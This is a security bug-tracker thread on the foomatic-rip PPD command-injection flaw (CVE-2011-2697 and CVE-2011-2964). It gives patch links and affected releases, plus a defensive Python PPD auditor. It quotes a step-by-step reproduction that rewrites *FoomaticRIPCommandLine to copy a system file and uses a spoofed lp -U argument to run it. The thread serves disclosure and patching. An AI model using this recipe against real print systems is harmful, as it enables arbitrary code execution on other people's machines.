It was found that the foomatic-rip universal print filter did not properly sanitize the content of the "files to be printed" command line argument prior to performing the print job. A remote attacker could provide a specially-crafted PostScript Printer Description (PPD) file and trick the local user into printing it, which, once performed, could lead to arbitrary code execution with the privileges of the user running the foomatic-rip tool.

References:
[1] https://bugzilla.novell.com/show_bug.cgi?id=698451
[2] http://www.openwall.com/lists/oss-security/2011/07/13/3 (CVE Request)

Proposed patch against the foomatic-rip C-source code:
[3] https://bugzilla.novell.com/show_bug.cgi?id=698451#c24

Proposed patch against the foomatic-rip Perl script:
[4] https://bugzilla.novell.com/show_bug.cgi?id=698451#c25
Created attachment 512673 [details] Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch
Created attachment 512674 [details] Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue affects the versions of the foomatic package, as shipped with Fedora releases 14 and 15. Please schedule an update.
Created foomatic tracking bugs for this issue

Affects: fedora-all [bug 721008]
Further detail from Novell bugzilla [1] how to reproduce the issue (scenario would need to be modified a bit though, to successfully apply to foomatic-rip versions, shipped across Red Hat products):

==============================================================================
How to reproduce with foomatic-rip:

1. Set up a queue which uses foomatic-rip
   i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry:

   # lpadmin -p testy2 -v file:/dev/null \
     -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz \
     -E

   If you don't have openSUSE 11.4 the Generic-PCL_5c_Printer.ljet4.ppd.gz
   is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz

2. Get the PPD as normal user:

   $ wget http://localhost:631/printers/testy2.ppd
   ...
   2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829]

3. Modify the PPD as normal user:
   Change the *FoomaticRIPCommandLine: entry (up to the *End line)
   as one likes, e.g. to this single line (without *End line):

   *FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"

4. Print a dummy job to find out the current job id as normal user:

   $ echo Hello | lp -d testy2
   request id is testy2-111

5. Print the malicious job as normal user:

   $ lp -d testy -U'-p/var/spool/cups/d00112-001' \
     -o document-format=text/plain testy2.ppd
   request id is testy-112

6. Verify that the FoomaticRIPCommandLine was actually executed:

   # ls -l /tmp/testy2.out
   -rw------- 1 lp lp 57 Jun  7 12:40 /tmp/testy2.out
   # cat /tmp/testy2.out
   openSUSE 11.4 (x86_64)
   VERSION = 11.4
   CODENAME = Celadon
==============================================================================

And one correction regarding point 5. yet:

How to reproduce with foomatic-rip:
...
5. Print the malicious job as normal user:

   $ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \
     -o document-format=text/plain testy2.ppd
   request id is testy2-112
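The entry rewritten in step 3 above is handed to the shell by foomatic-rip, so a PPD obtained from an untrusted source is effectively a script, whichever route (the -U trick above or any other) gets it selected as the queue's PPD. The scanner below is an added example, not code from foomatic-rip, CUPS or the patches referenced in this bug: it extracts every *FoomaticRIPCommandLine value from a PPD (single-line or *End-terminated multi-line), splits it into pipeline stages, and flags stages whose program is outside an allowlist, redirections into files, and command lines that do not even parse. The allowlist, the helper names and the two sample PPD fragments are assumptions constructed for this example.

```python
#!/usr/bin/env python3
"""Audit PPD files for *FoomaticRIPCommandLine entries before trusting them.

Added example; not foomatic-rip's or CUPS' own code. foomatic-rip runs the
*FoomaticRIPCommandLine value through the shell, so a PPD from an untrusted
source must be reviewed as executable content.
"""
import re
import shlex
import sys
from typing import List

# Assumption: a legitimate Foomatic pipeline starts each stage with one of
# these programs. The set is illustrative for this example, not an official list.
ALLOWED_COMMANDS = {"gs", "pdftops", "pstops", "foomatic-gswrapper",
                    "foo2zjs-wrapper", "cat"}

# PPD string values are double-quoted and may span lines (ended by *End);
# a value cannot itself contain a double quote, so [^"]* is sufficient.
CMDLINE_RE = re.compile(r'^\*FoomaticRIPCommandLine:\s*"([^"]*)"', re.MULTILINE)
CUPSFILTER_RE = re.compile(r'^\*cupsFilter:\s*"([^"]*)"', re.MULTILINE)
SEPARATORS = {"|", "||", "&&", ";", "&", "|&"}
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def extract_command_lines(ppd_text: str) -> List[str]:
    """Return every *FoomaticRIPCommandLine value with whitespace folded."""
    return [" ".join(m.split()) for m in CMDLINE_RE.findall(ppd_text)]


def uses_foomatic_rip(ppd_text: str) -> bool:
    """True if a *cupsFilter entry dispatches jobs to foomatic-rip at all."""
    return any("foomatic-rip" in f for f in CUPSFILTER_RE.findall(ppd_text))


def split_pipeline(cmdline: str) -> List[List[str]]:
    """Split a shell command line into simple commands (lists of tokens).

    Raises ValueError on unbalanced quotes; callers report that as a finding.
    """
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = ""  # '#' is not a comment inside a command line
    stages, current = [], []
    for tok in lex:
        if tok in SEPARATORS:
            if current:
                stages.append(current)
            current = []
        elif tok in ("(", ")"):
            continue
        else:
            current.append(tok)
    if current:
        stages.append(current)
    return stages


def audit_command_line(cmdline: str) -> List[str]:
    """Return findings for one command line; an empty list means nothing flagged."""
    try:
        stages = split_pipeline(cmdline)
    except ValueError as exc:
        return [f"unparseable command line ({exc})"]
    findings = []
    for stage in stages:
        # Leading VAR=value assignments are not the program name.
        words = [w for w in stage if not ASSIGNMENT_RE.match(w)]
        if not words:
            continue
        program = words[0].rsplit("/", 1)[-1]
        if program not in ALLOWED_COMMANDS:
            findings.append(f"program not in allowlist: {words[0]}")
        for i, tok in enumerate(stage):
            if tok in (">", ">>", "<"):
                target = stage[i + 1] if i + 1 < len(stage) else "<missing>"
                if target != "/dev/null":
                    findings.append(f"redirection to {target}")
    return findings


def audit_ppd(ppd_text: str) -> List[str]:
    """Audit every *FoomaticRIPCommandLine in a PPD; empty list means clean."""
    findings = []
    for n, cmdline in enumerate(extract_command_lines(ppd_text), 1):
        for f in audit_command_line(cmdline):
            findings.append(f"FoomaticRIPCommandLine #{n}: {f}")
    return findings


# Constructed sample: a PCL-style fragment with the multi-line form shipped by
# Foomatic, and the same entry rewritten to run an arbitrary program.
BENIGN_PPD = '''*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 100 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dQUIET -dNOPAUSE
 -sDEVICE=ljet4 -sOutputFile=- -"
*End
'''
TAMPERED_PPD = '''*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 100 foomatic-rip"
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"
'''

if __name__ == "__main__":
    # Usage: ppd_audit.py file.ppd [...]; with no arguments, audit the samples.
    sources = [(p, open(p, encoding="latin-1").read()) for p in sys.argv[1:]] or \
              [("benign-sample", BENIGN_PPD), ("tampered-sample", TAMPERED_PPD)]
    for name, text in sources:
        if not uses_foomatic_rip(text):
            print(f"{name}: no foomatic-rip cupsFilter, skipping")
            continue
        for finding in audit_ppd(text) or ["clean"]:
            print(f"{name}: {finding}")
```

Run it against the PPDs in /etc/cups/ppd (or any PPD a user hands you) before installing a queue; a finding is a reason to read the file, not proof of an attack, since the allowlist is deliberately narrow and a vendor PPD may legitimately call a driver wrapper not listed here.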
The CVE identifier of CVE-2011-2697 has been assigned to this issue: http://www.openwall.com/lists/oss-security/2011/07/18/3
Created attachment 515184 [details] ppd containing cupsFilter
MITRE has assigned two CVE names here:

Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to
the following vulnerability:

Name: CVE-2011-2697
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697
Assigned: 20110711
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5 allows
remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file.

Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to
the following vulnerability:

Name: CVE-2011-2964
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964
Assigned: 20110729
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6 allows
remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file, a different vulnerability
than CVE-2011-2697.
Looking at the description of the CVEs from above:

CVE-2011-2697 is for the perl version in foomatic 3.x:
Affects: rhel-4, rhel-5

CVE-2011-2964 is for the C version in foomatic 4.x:
Affects: rhel-6, Fedora
Keeping this bug for the perl issue.
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 4
  Red Hat Enterprise Linux 5

Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html